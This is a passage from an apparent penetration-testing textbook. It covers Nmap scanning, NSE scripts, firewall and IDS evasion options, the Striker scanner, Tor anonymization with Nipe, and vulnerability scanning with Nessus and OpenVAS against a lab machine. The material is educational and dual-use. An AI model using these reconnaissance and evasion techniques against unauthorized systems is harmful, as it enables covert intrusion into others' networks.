• -r (Don't randomize ports): This option will set sequential port scanning (from lowest to highest).
• --top-ports <1 or larger>: This option will only scan the N highest proportion ports found in the nmap-service file.

To scan ports 22 and 25 using the TCP NULL scan method, you can use the following command:

nmap -sN -p 22,25 172.16.43.156 

The following command line is the result:

Nmap scan report for 172.16.43.156
Host is up (0.00089s latency).
PORT     STATE         SERVICE
22/tcp   open|filtered ssh
25/tcp   open|filtered smtp
MAC Address: 00:0C:29:18:0F:08 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.52 seconds

Here is a dump fragment of the packets:

23:23:38.581818 IP 172.16.43.150.61870 >172.16.43.156.22: Flags [], win 1024, length 0 
  0x0000:  4500 0028 06e4 0000 2f06 92ce c0a8 3866  E..(..../.....8f 
  0x0010:  c0a8 3867 f1ae 0016 dd9e bf90 0000 0000  ..8g............ 
  0x0020:  5000 0400 2ad2 0000                      P...*... 

23:23:38.581866 IP 172.16.43.150.61870 >172.16.43.156.25: Flags [], win 1024, length 0 
  0x0000:  4500 0028 1117 0000 3106 869b c0a8 3866  E..(....1.....8f 
  0x0010:  c0a8 3867 f1ae 0019 dd9e bf90 0000 0000  ..8g............ 
  0x0020:  5000 0400 2acf 0000                      P...*... 

23:23:39.683483 IP 172.16.43.150.61871 >172.16.43.156.25: Flags [], win 1024, length 0 
  0x0000:  4500 0028 afaf 0000 2706 f202 c0a8 3866  E..(....'.....8f 
  0x0010:  c0a8 3867 f1af 0019 dd9f bf91 0000 0000  ..8g............ 
  0x0020:  5000 0400 2acc 0000                      P...*... 

23:23:39.683731 IP 172.16.43.150.61871 >172.16.43.156.22: Flags [], win 1024, length 0 
  0x0000:  4500 0028 5488 0000 3506 3f2a c0a8 3866  E..(T...5.?*..8f 
  0x0010:  c0a8 3867 f1af 0016 dd9f bf91 0000 0000  ..8g............ 
  0x0020:  5000 0400 2acf 0000                      P...*...   

From the packets shown in the previous code, we can see the following:

• In the first and second packets, the attack machine checks if port 22 on the target machine is open. After a while, it checks port 25 on the target machine.
• In the third and fourth packets, the attack machine checks if port 25 on the target machine is open. After a while, it checks port 22 on the target machine.
• After waiting for some time, since the target machine still hasn't responded, Nmap concludes that both ports are open or filtered.

Nmap Output Options

Nmap results can be saved to an external file. This option is useful if you want to process Nmap results with other tools. Even if the output is saved to a file, Nmap will still display the results on the screen.

Nmap supports several output formats, as follows:

• Interactive output: This is the default output format, where results are sent to standard output.
• Normal output (-oN) : This format is similar to interactive output but does not include runtime information and warnings.
• XML output (-oX) : This format can be converted to HTML format, parsed by the Nmap Graphical User Interface (GUI), or imported into a database. We recommend using this output format whenever possible.
• Grepable output (-oG) : This format is deprecated but still quite popular. Grepable output includes comments (lines beginning with a hash (#) character) and target lines. A target line includes a combination of six token fields separated by tabs and followed by colons. The fields are Host, Ports, Protocols, Ignored State, OS, Seq Index, IP ID Seq, and Status. This output is sometimes used if we want to process Nmap output using UNIX commands like grep and awk.

You can save Nmap results in all three formats (Normal, XML, and Grepable) at once using the -oA option.

To save scan results to an XML file (myscan.xml), use the following command:

nmap 172.16.43.156 -oX myscan.xml  

Here is a fragment of the XML file:

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE nmaprun> 
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?> 
<!-- Nmap 6.49BETA4 scan initiated Mon Feb 15 18:06:20 2016 as: nmap -oX metasploitablescan.xml 172.16.43.156 --> 
<nmaprun scanner="nmap" args="nmap -oX metasploitablescan.xml 172.16.43.156" start="1455588380" startstr="Mon Feb 15 18:06:20 2016" version="6.49BETA4" 
<scaninfo type="syn" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700, 

Some ports have been removed from the above fragment for brevity. In the XML output, you will see Nmap for each port scanned. The following shows each port scanned individually and its response. Again, not all ports are included for brevity:

<verbose level="0"/>
<debugging level="0"/>
<host starttime="1455588380" endtime="1455588382"><status state="up" reason="arp-response" reason_ttl="0"/>
<address addr="172.16.43.156" addrtype="ipv4"/>
<address addr="00:0C:29:18:0F:08" addrtype="mac" vendor="VMware"/>
<hostnames>
</hostnames>
<ports><extraports state="closed" count="977">
<extrareasons reason="resets" count="977"/>
</extraports>
<port protocol="tcp" portid="21"><state state="open" reason="syn-ack" reason_ttl="64"/><service name="ftp" method="table" conf="3"/></port>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="64"/><service name="ssh" method="table" conf="3"/></port>
<port protocol="tcp" portid="23"><state state="open" reason="syn-ack" reason_ttl="64"/><service name="telnet" method="table" conf="3"/></port>
<port protocol="tcp" portid="25"><state state="open" reason="syn-ack" reason_ttl="64"/><service name="smtp" method="table" conf="3"/></port>
<port protocol="tcp" portid="53"><state state="open" reason="syn-ack" reason_ttl="64"/><service name="domain" method="table" conf="3"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="64"/><service name="http" method="table" conf="3"/></port>
<port protocol="tcp" portid="111"><state state="open" reason="syn-ack" reason_ttl="64"/><service name="rpcbind" method="table" conf="3"/></port>
<port protocol="tcp" portid="139"><state state="open" reason="syn-ack" reason_ttl="64"/><service name="netbios-ssn" method="table" conf="3"/></port>

The XML output is a bit daunting. To make it easier, you can convert the Nmap XML file to HTML. This way, you can get a clean output for reporting, as you might be reporting to non-technical people who may not be accustomed to viewing raw output. To convert the XML file, you can use the xsltproc program. The following command is used to convert the XML file to an HTML file:

xsltproc myscan.xml -o myscan.html 

Here is a part of the HTML report, displayed by the Firefox ESR browser included in Kali Linux:

If you want to process Nmap XML output to suit your preferences, there are several XML libraries available for common programming languages. Additionally, there are several libraries specifically developed to process Nmap output:

• Perl: Nmap-Parser (search.cpan.org/dist/Nmap-Parser/)
• Python: python-nmap (xael.org/norman/python/python-nmap/)
• Ruby: Ruby Nmap (rubynmap.sourceforge.net/)
• PowerShell: PowerShell script to parse Nmap XML output (www.sans.org/windows-security/2009/06/11/powershell-script-to-parse-nmap-xml-output)

Nmap Timing Options

Nmap comes with six timing modes that you can set using the option (-T):

• paranoid (0): In this timing mode, one packet is sent every five minutes. Packets are sent serially. This mode can be used to avoid IDS detection.
• sneaky (1): This mode sends a packet every 15 seconds, with no parallel packet sending.
• polite (2): This mode sends a packet every 0.4 seconds, with no parallel transmission.
• normal (3): This mode sends multiple packets to multiple targets simultaneously. This is the default timing mode used by Nmap. It balances time and network load.
• aggressive (4): Nmap will scan a given host for only 5 minutes before moving on to the next target. Nmap will not wait for a response for more than 1.25 seconds.
• insane (5): In this mode, Nmap will scan a given host for only 75 seconds before moving on to the next target. Nmap will not wait for a response for more than 0.3 seconds.

Based on our experience, the default timing mode usually works well, unless you want to perform a more stealthy or faster scan.

Useful Nmap Options

In this section, we will discuss several Nmap options that are very useful when performing penetration testing work.

Service Version Detection

When performing a port scan, you can also ask Nmap to check the service version. This information is very useful in the subsequent vulnerability identification process.

To use this feature, add the -sV option to Nmap.

Here is an example of using this feature. We want to find the software version used on port 22:

nmap -sV 172.16.43.156 -p 22

Here is the result of this command:

According to the above information, we know that there is an SSH service on port 22 using OpenSSH software version 4.7p1, and the SSH protocol is 2.0.

Operating System Detection

Nmap can also query the operating system used by the target machine. This information is very useful in the subsequent vulnerability identification process.

To use this feature, add the -O option to Nmap.

Here is an example of using this feature. We want to find the operating system used on the target machine:

nmap -O 172.16.43.156 

The following command line is the result of this command:

According to the above information, we can see that the remote system is a Linux OS using Linux kernel version 2.6.9 - 2.6.33. If these Linux kernels have vulnerabilities, we can exploit them.

Aggressive scan

If the -A option is used, it will enable the following probes:

• Service version detection (-sV)
• OS Detection (-O)
• Script scanning (-sC)
• Traceroute (--traceroute)

This type of scan may take some time to complete. The following command can be used for an aggressive scan:

nmap -A 172.16.43.156

Here is a summary result of this command:

Besides detailed information about ports, services, and certificates, we can also get detailed information about the Apache web server configured on the target machine later in the results:

Nmap for Scanning IPv6 Targets

In the previous section, we mentioned that you can specify IPv6 targets in Nmap. In this section, we will delve into this topic.

For this scenario, the IPv6 address of each machine is as follows:

Target machine: fe80::20c:29ff:fe18:f08

To scan an IPv6 target, simply use the -6 option and define the IPv6 target address. Currently, you can only specify a single IPv6 address. The following command is an example of scanning an IPv6 address:

nmap -6 fe80::20c:29ff:fe18:f08

Here is the result of this command:

We can see that in the IPv6 test, the number of open ports is less than in the IPv4 test. This may be because the services on the remote machine do not support IPv6 yet.

Scanning with Netdiscover

Netdiscover is another discovery tool built into Kali Linux 2018.2. Currently at version .03-pre-beta7, written by Jaime Penalba, Netdiscover can be used for reconnaissance and discovery on wireless and switched networks using ARP requests.

To start Netdiscover, type netdiscover -h to see usage options. (If you type just the netdiscover command, Netdiscover will start a default scan.)

To scan a range of IP addresses, type netdiscover -r followed by the IP range. In this example, we used netdiscover -r 10.10.0.0/24. You can also optionally use the netdiscover -p option for a passive scan.

In the preceding scan, we can see that Dell and HP workstations, Cisco devices, and even Xerox multifunction devices were discovered.

Nmap Scripting Engine

Although Nmap itself is a powerful network exploration tool, with the additional scripting engine feature, Nmap becomes even more powerful. Using the Nmap Scripting Engine (NSE), users can automate various network tasks, such as checking for new security vulnerabilities in applications, detecting application versions, or other features not available in Nmap. Nmap already includes various NSE scripts in its package, but users can also write their own scripts to meet their needs.

NSE scripts utilize the Lua programming language (www.lua.org) embedded in Nmap. Currently, NSE scripts are divided into the following categories:

• auth: Scripts in this category are used to find authentication settings on the target system; for example, by using brute-force techniques.

• default: These scripts are run using the -sC or -A options. A script is grouped into the default category if it meets the following requirements:

  • It must be fast
  • It needs to produce valuable and actionable information
  • Its output needs to be detailed and concise
  • It must be reliable
  • It should not be intrusive to the target system
  • It should not leak information to third parties

• discovery: These scripts are used for network discovery.

• DoS: Scripts in this category may cause Denial of Service (DoS) on the target system. Use with caution.

• exploit: These scripts will exploit security vulnerabilities on the target system. Penetration testers need permission to run these scripts on the target system.

• external: These scripts may leak information to third parties.

• fuzzer: These scripts are used for fuzzing the target system.

• intrusive: These scripts may crash the target system or use all resources of the target system.

• malware: These scripts will check for the presence of malware or backdoors on the target system.

• safe: These scripts should not cause service crashes, Denial of Service (DoS), or exploit the target system.

• version: These scripts are used with the version detection option (-sV) to perform advanced detection of services on the target system.

• vuln: These scripts are used to check for security vulnerabilities in the target system.

In Kali Linux, these Nmap scripts are located in the /usr/share/nmap/scripts directory, and currently, Nmap version 7.70 included in Kali Linux contains 588 scripts.

There are several command-line arguments to invoke NSE, as follows:

• -sC or --script=default: This will perform a scan using the default scripts.
• --script <filename> | <category> | <directories>: This will perform a scan using scripts defined by filename, category, or directory.
• --script-args <args>: This provides a script argument. An example of such an argument is a username or password if you use the auth category.

For the port scan of the 172.16.43.156 host and utilizing the default script category, we can give the following command:

nmap -sC 172.16.43.156

Here is a shortened result:

Starting Nmap 6.49BETA4 ( https：//nmap.org ) at 2016-02-22 17:09 PST
Nmap scan report for 172.16.43.156
Host is up (0.000099s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet
25/tcp   open  smtp
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2016-02-12T05:51:52+00:00; -10d19h17m25s from scanner time.
53/tcp   open  domain
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Metasploitable2 - Linux
8009/tcp open  ajp13
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  unknown
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:18:0F:08 (VMware)

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-02-12T00:51:49-05:00

Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds

From the previous information, you can see that the Nmap results are now more thorough. This is because it uses the NSE default scripts.

However, if you only want to get specific information about the target system, you can use scripts individually. If we want to gather information about the HTTP server, we can use several HTTP scripts from NSE, such as http-enum, http-headers, http-methods, and http-php-version, using the following command:

nmap --script http-enum,http-headers,http-methods,http-php-version -p 80 172.16.43.156  

Here is the result of this command:

By utilizing the four NSE scripts related to HTTP, we can get more information about the target system's web server:

• There are several interesting directories to check: Tikiwiki, test, and phpMyAdmin
• We have an interesting file: phpinfo.php
• We know that the server is using PHP version 5.2.3 -5.2.5

After discussing Nmap, let's discuss another port scanning tool.

There is a useful NSE script called Nmap NSE Vulscan (www.computec.ch/mruef/software/nmap_nse_vulscan-1.0.tar.gz) that can help you map the version information obtained from the target machine to vulnerability databases such as CVE (cve.mitre.org/), VulDB (vuldb.com/?), SecurityTracker (securitytracker.com/), and SecurityFocus (www.securityfocus.com/).

The following screenshot shows an example result from the CVE script:

Nmap Options for Firewall/IDS Evasion

During a penetration test, you may encounter systems protected by firewalls and IDS. If you only use default settings, your operations may be detected, or you may not get correct results from Nmap. The following options can be used to help evade firewalls/IDS:

• -f (fragment packets): The purpose of this option is to make the packets harder to detect. By specifying this option once, Nmap will fragment the packet into 8 bytes or less after the IP header.
• –mtu: With this option, you can specify your own packet size fragmentation. The Maximum Transmission Unit (MTU) must be a multiple of 8, otherwise Nmap will error out.
• -D (decoys): By using this option, Nmap will send some probes from user-specified spoofed IP addresses. The idea is to obscure the user's real IP address in log files. The user's IP address is still in the log. You can use RND to generate random IP addresses, or RND：number to generate <number> IP addresses. The hosts you use for decoys should be active, otherwise the target will be overwhelmed. Also, remember that using many decoys can cause network congestion, so you may want to avoid this, especially when scanning a client's network.
• –source-port or -g (spoof source port): This option is very useful if the firewall is configured to allow all incoming traffic from a specific port.
• –data-length: This option is used to change the default data length sent by Nmap to avoid being detected as an Nmap scan.
• –max-parallelism: Usually set this option to 1 to instruct Nmap to send no more than one probe at a time to the target host.
• –scan-delay <time>: This option can be used to evade IDS/IPS that use thresholds to detect port scanning activity.

You can also try other Nmap evasion options as described in the Nmap manual (nmap.org/book/man-bypass-firewalls-ids.html).

Automated Scanning with Striker

Striker is an automated scanning and deep information-gathering tool built with Python for performing port/service and vulnerability scanning. Similar to the automated tools we used in the previous chapter (Red_Hawk and Devploit), Striker is simple to install and use.

We must first download Striker. To do this, open a terminal and change to the Desktop (or your chosen directory) by entering:

cd Desktop

Enter the following to clone Striker to your Desktop (or your chosen directory):

git clone https：//github.com/s0md3v/Striker.git

Once the download is successful (as shown in the previous screenshot with 100% for objects and deltas), enter cd Striker, then use the ls command to list the files in the Striker folder. You should see five files listed, including requirements.txt and striker.py.

To make Striker run without errors, we must first ensure all requirements for running Striker are met by using the package management installer (pip), including the Whois module (which is necessary for information gathering).

To do this, we run the following two commands, pip install -r requirements.txt, followed by pip install whois:

After successfully installing all requirements, enter pip install whois (even if requirements may have been installed):

Finally, to run Striker, we enter python striker.py:

Now the Striker GUI will run. As a fully automated tool, from this point onwards only the target IP or URL is required.

In this example, we used the scanme.nmap.org/ website we used for the Nmap scanning section. Compare the scan results with what Nmap discovered earlier:

Note that Striker also discovered DNS record information and two email addresses, as shown in the following screenshot:

Anonymizing with Nipe

Nipe is a tool that utilizes the Tor network as the user's default gateway, thus routing all traffic through the Tor network, typically used to provide a degree of privacy and anonymity. It is important to note that when using privacy and anonymity tools, merely masking the IP address will not provide anonymity, as DNS information may still be available. Both IP and DNS information must be masked.

We first install Nipe by cloning it to our computer's Desktop or our chosen directory. Open a terminal and change the directory to Desktop (or your chosen directory):

cd Desktop

Clone Nipe to your computer by entering:

git clone https：//github.com/GouveaHeitor/nipe.git

Change to the Nipe directory by entering cd Nipe, then list the directory contents by entering ls:

To install Nipe, enter cpan install Switch JSON LWP::UserAgent. Press Enter when prompted for automatic installation:

To install the Nipe dependency, run the command perl nipe.pl install:

Before starting Nipe, check your public IP address and DNS IP, and compare them with the IP given after starting Nipe. Some example websites you can use to view your public IP are www.whatsmyipaddress.com and www.dnsleak.com.

To start the Nipe service, enter perl nipe.pl start:

You can also restart the service by entering perl nipe.pl restart to mask your IP to a different region. All commands for installing and using the Nipe tool can also be found on its GitHub page at github.com/GouveaHeitor/nipe.

Use the previously listed IP and DNS verification websites to check that your settings have indeed changed.

Summary

In this chapter, we discussed the target discovery process. We started by discussing the purpose of target discovery: to identify target machines and find out the operating system used by the target machines. Then, we continued using tools provided by Kali Linux and GitHub that can be used for discovery and identification of target machines.

We discussed several tools for host discovery and scanning, such as ping, Nmap, p0f, and Striker, and also looked at using Nipe to mask your IP and DNS to evade detection.

In the next chapter, we will discuss vulnerability scanning and the tools used for this purpose in Kali Linux.

Questions

1. Which tool can be used to send ICMP echo requests to multiple hosts at once? (fping)
2. How many scripts are there in Nmap 7.7? (588 scripts)
3. What is the purpose of the FIN flag? (It indicates that there is no more data to send and the connection should be terminated.)
4. What does a filtered port indicate? (A packet-filtering device is blocking the probe from reaching the target.)
5. When evading firewalls and IDS, which Nmap option can be used to make packets harder to detect? (-f, for fragmenting packets)
6. What is the command to scan a range of IP addresses using the Netdiscover tool? (netdiscover -r)
7. Which option can be used in Netdiscover to run a passive scan? (-p)
8. Which website can be used to ensure DNS information is not leaked? (www.dnsleak.com)

Further Reading

Linux network tools: gist.github.com/miglen/70765e663c48ae0544da08c07006791f

Nmap Scripting Engine: nmap.org/book/nse.html

Port Scanning Techniques: nmap.org/book/man-port-scanning-techniques.html

Chapter 6: Vulnerability Scanning

Vulnerability mapping is the process of identifying and analyzing critical security flaws in a target environment. Sometimes referred to as a vulnerability assessment. It is one of the key areas of a vulnerability management program, through which the relationship between an IT infrastructure's security controls and known vulnerabilities is analyzed. Once information gathering, discovery, and enumeration operations are complete, it is time to investigate the target infrastructure for vulnerabilities that could lead to the target being compromised and breach the confidentiality, integrity, and availability of business systems.

In this chapter, we will discuss two common types of vulnerabilities, introduce various standards for classifying vulnerabilities, and explain some well-known vulnerability assessment tools available under the Kali Linux operating system. This chapter explores the following topics:

• The concept of two general types of vulnerabilities: local and remote.
• Vulnerability taxonomies that point to industry standards that can be used to classify any vulnerability according to their unified commonality pattern.
• Some security tools that can help us discover and analyze security vulnerabilities present in the target environment. These tools are categorized based on their basic function within the security assessment process. These include Nessus, Cisco, fuzzing tools, SMB, SNMP, and web application analysis tools.

Please note that when dealing with any type of penetration testing assignment, whether internal or external, manual and automated vulnerability assessment procedures should be treated equally. Relying strictly on automation can sometimes produce false positives and false negatives. The auditor's knowledge of technology-related assessment tools can be a decisive factor when performing a penetration test. The tools and skills used by the tester should be constantly updated to ensure success. Furthermore, it is necessary to mention that automated vulnerability assessment is not the ultimate solution; in some cases, automated tools may not be able to identify logic errors, undiscovered vulnerabilities, unreleased software vulnerabilities, and human factors that affect security.

Therefore, it is recommended to use a comprehensive approach that combines automated and manual vulnerability assessment methods. This will increase the likelihood of a successful penetration test and provide the best information for remediating vulnerabilities.

Technical Requirements

A laptop or desktop with at least 6GB RAM, a quad-core CPU, and 500GB HDD space. For the operating system, we will use Kali Linux 2018.2 or 2018.3 (as a virtual machine, or installed on HDD, SD card, or USB flash drive).

Vulnerability Types

There are three main vulnerability categories, based on which the type of flaw can be distinguished, including local and remote vulnerabilities. These categories are typically classified into design, implementation, and operational vulnerabilities:

• Design vulnerabilities: These are discovered due to weaknesses found in the software specification.
• Implementation vulnerabilities: These are technical security flaws found in the system's code.
• Operational vulnerabilities: These are vulnerabilities that may arise due to incorrect configuration and deployment of the system in a specific environment.

Based on these three categories, we have two general types of vulnerabilities, local and remote, which can appear in any category of vulnerability.

Local Vulnerabilities

A situation where an attacker requires local access to trigger a vulnerability by executing a piece of code is called a local vulnerability. By exploiting this type of vulnerability, an attacker can raise their access privileges, gaining unrestricted access to the computer.

Let's take an example where Bob has access to a system running MS Windows Server 2008 (32-bit, x86 platform). By implementing security policies, the administrator has restricted his access privileges, which will not allow him to run specific applications. In an extreme case, he discovers that by using malicious code, he can gain system-level or kernel-level access. By exploiting a known vulnerability (such as CVE-2013-0232, GP Trap Handler nt!KiTrap0D), he gains elevated privileges, thus enabling him to perform all administrative tasks and access applications without restriction. This clearly shows us how a malicious adversary can exploit vulnerabilities to gain unauthorized access to a system.

For more information on CVE-2013-0232 MS Windows Privilege Escalation vulnerability, visit www.exploit-db.com/exploits/11199/.

Remote Vulnerabilities

A remote vulnerability is one where the attacker has no prior access but can still trigger malicious code over the network to exploit the vulnerability. This type of vulnerability allows an attacker to access a computer remotely without facing any physical or local barriers.

For example, Bob and Alice are each connected to the Internet. They have different IP addresses and are geographically separated in two different regions. Suppose Alice's computer is running Windows XP and holds secret biotechnology information. Let's also assume Bob already knows the OS and IP address of Alice's machine. Now Bob is looking for a solution that allows him to remotely access her computer. Eventually, he finds that the MS08-067 Windows Server Service vulnerability can easily remotely exploit Windows XP machines.

He then triggers the exploit against Alice's computer and gains full access to it.

For more information on the MS08-067 MS Windows Server Service vulnerability, visit www.exploit-db.com/exploits/6841/.

Vulnerability Classification

Over the past few years, with the increase in the number of available technologies, attempts have been made to introduce the best taxonomy to classify all common sets of vulnerabilities. However, no single taxonomy can represent all common coding errors that may affect system security. This is because a single vulnerability may belong to multiple categories. Furthermore, each system platform has its foundation for connectivity, complexity, and extensibility in how it interacts with the environment. Therefore, the classification standards proposed in the following table will help you identify most common security vulnerabilities to the best of your ability. Please note that most of these taxonomies have already been implemented in many security assessment tools to investigate software security issues in real-time:

Security Classification Resource Link
Seven Pernicious Kingdoms www.cigital.com/papers/download/bsi11-taxonomy.pdf
Common Weakness Enumeration cwe.mitre.org/data/index.html
OWASP Top Ten www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
Klocwork www.klocwork.com/products/documentation/Insight-9.1/Taxonomy
WASC Threat Classification projects.webappsec.org/Threat-Classification

The primary function of each of these taxonomies is to organize a set of security vulnerabilities that can be used by security practitioners and developers to identify specific errors that may impact system security. Therefore, no taxonomy should be considered complete and accurate.

Automated Vulnerability Scanning

Pure penetration testers often comment that using automated vulnerability scanners is cheating, but in some cases, such as performing a penetration test within a limited time frame, vulnerability scanners are essential for obtaining a large amount of information about the target network in a short amount of time.

Vulnerability Scanning with Nessus 7

Tenable's Nessus is a very popular vulnerability assessment tool that has been around for nearly 20 years. Nessus is accessible through an annual subscription; however, the folks at Tenable have made Nessus Professional available as a 7-day trial for those who wish to try it.

Before installing Nessus, you may want to note the Kali Linux version you are running to ensure you download the appropriate version of Nessus.

To do this, simply enter uname -a in the terminal, as follows:

In this screenshot, we can see we are using a Debian-based 64-bit version (amd64) of Kali Linux. Therefore, we need to download the 64-bit build for Debian.

Installing the Nessus Vulnerability Scanner

To install Nessus in Kali Linux, open a browser and navigate to the Nessus evaluation page at www.tenable.com/try. The evaluation version has all the features of the full version, but the scan is limited to 16 IPs.

You will need to register with Tenable so that an evaluation code can be sent to your email.

After receiving the email with the evaluation code, you can follow these steps to download the appropriate version of Nessus in Kali Linux, as follows:

Select the Nessus version to install, click Accept to agree to the Nessus Terms of Use, and then click the Save File option when prompted to save the Nessus download. This will save the file to the Downloads folder in Kali Linux. In this example, I selected the 64-bit version of Nessus (Nessus-7.1.3-debian6_amd64.deb).

After the download is complete, open a new terminal and change to the Downloads directory by entering cd Downloads. Enter ls to see the contents of the Downloads directory. Doing this is also useful because we can copy the name of the Nessus download file and paste it into the following command. Then, install Nessus by entering dpkg -i Nessus-7.1.3-debian6_amd64.deb, as follows:

If a newer version of Nessus is available, execute the dpkg -i command with the name of your specific download file and version.

In the Downloads folder, start the Nessus service by entering service nessusd start. Enter the Kali Linux password when prompted, as follows:

To use Nessus, open a browser, enter the URL https：//localhost：8834 in the address bar, and press Enter. When the insecure warning banner appears, click the Advanced button, then click Add Exception, and finally click Confirm Security Exception, as follows:

Follow the prompts for steps 1-3, first create an account by specifying a username and account, then click Continue.

In step 2, set the default Scanner Type option to Home, Professional, or Manager, and paste the activation code received via email into the Activation Code field. Click Continue to proceed. If everything goes well, Nessus will begin initializing, downloading, and compiling the required plugins, as follows:

This may take a few minutes, depending on your internet connection speed. In the meantime, feel free to browse the many titles on penetration testing and Kali Linux available from Packt Publishing at www.packtpub.com.

After all updates are complete, the Nessus interface will load. Click the New Scan button in the upper right corner to see all available scan types, as shown in the following screenshot:

In addition to some templates only available with a paid subscription, a variety of scanning templates are available. Beyond performing host discovery and advanced scans, Nessus can perform many types of advanced vulnerability scanning, including the following:

• Cloud Infrastructure Scans
• Local and Remote Malicious Shell Detection Scans
• Internal PCI Network Scans
• Linux and Windows Malware Scans
• Spectre and Meltdown Scans
• Wannacry Ransomware Scans
• Web Vulnerability Scans

Some of these are shown in the following screenshot:

For this assessment, I will use a vulnerable Linux web server for vulnerability disclosure purposes. As described in Chapter 2, Setting Up Your Test Laboratory, you can choose to set up Metasploitable 2, Metasploitable 3, Damn Vulnerable Linux, or even BadStore.

Click the Advanced Scan template in the scan window and fill in the fields in the Basic section. In the Targets field, specify the host or host range to scan using the Advanced Scan template, as follows:

Explore the other sections in the left sidebar, as there are many different settings. These settings allow you to customize the scan to meet your specific requirements:

• Discovery: Nessus uses many different methods to discover active hosts. Here, you can set specific parameters for host discovery.
• Assessment: This allows you to set the type and depth of the scan.
• Report: When preparing a penetration test report, having detailed information about the vulnerability scan is important. This feature allows you to set reporting parameters.
• Advanced: Advanced settings allow you to change the number of hosts scanned at once and other timing parameters.

After configuring the scan, you can choose to Save or Launch. Now, you will see your scan listed under My Scans.

Click the play icon to the right of the given scan name. This will run the scan. If you click on the scan name while the scan is running, you will see the host and general vulnerability information, as follows:

Clicking on a host will take you to a more detailed list of discovered vulnerabilities. Vulnerabilities are color-coded as follows:

• Red - Critical
• Orange - High
• Yellow - Medium
• Green - Low
• Blue - Informational

As shown in the following screenshot, the scan results show that 70 vulnerabilities were discovered, of which 6 are critical and 17 are high, meaning this machine is very vulnerable:

Clicking on the colored vulnerability category displays the vulnerabilities from most vulnerable (i.e., Critical) to least vulnerable (Informational):

Clicking on a vulnerability provides the tester with more detailed information about the vulnerability, as follows:

This information includes not only information about the vulnerability, but also whether an exploit is available. This enables the penetration tester to plan additional attacks against these vulnerabilities:

Nessus is a powerful tool to use in any penetration test. It provides a wealth of information and functionality that cannot be covered in this section. It is recommended that you spend some time learning about the available features and how to use them. Additionally, Tenable has made a free Home version available for you to test. If you have an external IP, or are using Nessus for a client, you will have to use a paid version.

Vulnerability Scanning with OpenVAS

The Open Vulnerability Assessment System (OpenVAS) is an open-source vulnerability scanning framework. OpenVAS is easy to install and has a user-friendly interface for performing vulnerability assessments. According to the OpenVAS website (www.openvas.org/about.html), there are over 50,000 Network Vulnerability Tests (NVTs) available in the framework, which is part of Greenbone Networks' commercial vulnerability management framework.

To install OpenVAS, open a new terminal and enter apt-get install openvas, as follows:

Once OpenVAS is successfully installed, enter openvas-setup into the terminal to begin setup and configuration. This process may take some time, depending on your download speed:

At the end of the setup and configuration process, OpenVAS will generate a password key that will be required when starting OpenVAS:

To start the OpenVAS service, enter openvas-start, then connect to the web interface by entering https：//127.0.0.1：9392 or https：//localhost：9392 in a browser window.

When you use OpenVAS again, simply open a terminal and enter openvas-start, so there is no need to run the setup again.

You will also need to click Advanced, then Add Exception, and finally Confirm Security Exception after entering the previous URL, as shown in the following screenshot:

When prompted, log in using the username admin and the password generated during the setup process. Be sure to store this login information securely, as you will need it when using OpenVAS, as shown below:

To run a scan, click on Scans, then Tasks. An information box will open, prompting you to hover your mouse over the purple icon on the upper-left corner of the screen for the Task Wizard, as shown:

Click on Advanced Task Wizard. Enter the relevant information in the given fields. Note the Scan Config field has multiple scan types to choose from, including Discovery, Full and Fast, Full and Fast Ultimate, and Full and Very Deep Ultimate (the most time and resource intensive options). The Start Time option allows a penetration tester to schedule scans. This can be very useful because scans can be disruptive to the network, so you may want to run scans after work hours or over the weekend if necessary:

After completing all relevant fields, scroll down and click Create. This will launch the scan and display a summary of scan details and status, as shown:

To see more details about the task, click on the task name within the Name field:

Once the scan is complete, click on Completed. This will generate a report listing the vulnerabilities found and a severity rating for each vulnerability:

Clicking on each listed vulnerability displays more information, including a summary, impact, solution, affected software/OS, and other insights, as shown in the following screenshot:

Vulnerability Scanning for Linux with Lynis

Developed by Cisofy (www.cisofy.com), Lynis is a command-line security auditing tool available in Kali Linux. Lynis is free to use, but an enterprise version is also available. Lynis can be used to perform automated security audit assessments and vulnerability scans on various versions of Linux, macOS X, and Unix-based operating systems.

Lynis is notable for its focus on performing various HIPAA, PCIDSS, SOX, and GLBA compliance audits, which are of great value in enterprises that have adopted various compliance standards. Lynis can be downloaded and installed on standalone systems, thus eliminating most of the traffic generated by remote auditing and vulnerability assessment tools, although remote assessment is also an option.

